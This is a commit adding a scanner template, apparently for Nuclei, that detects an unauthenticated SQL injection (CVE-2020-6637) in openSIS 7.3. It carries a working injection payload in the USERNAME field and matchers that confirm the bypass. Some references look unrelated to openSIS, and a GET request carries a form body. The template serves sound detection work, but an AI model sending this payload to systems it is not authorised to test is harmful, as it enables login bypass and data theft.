Create CVE-2020-6637.yaml

cves/2020/CVE-2020-6637.yaml

@@ -0,0 +1,42 @@
+id: CVE-2020-6637
+
+info:
+  name: OpenSIS v7.3 unauthenticated SQL injection
+  author: pikpikcu
+  severity: high
+  description: openSIS Community Edition version 7.3 is vulnerable to SQL injection via the USERNAME parameter of index.php.
+  tags: cve,cve2020,sqli,opensis
+  reference: |
+      - https://hackerone.com/reports/643442
+      - https://github.com/concrete5/concrete5/pull/7999
+      - https://twitter.com/JacksonHHax/status/1389222207805661187
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/account/index.php'
+      - '{{BaseURL}}/opensis/index.php'
+      - '{{BaseURL}}/index.php'
+    headers:
+      Content-Type: application/x-www-form-urlencoded
+    body: |
+      USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=
+      
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'SQL STATEMENT:'
+          - "<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+        condition: and
+
+      - type: status
+        status:
+          - 200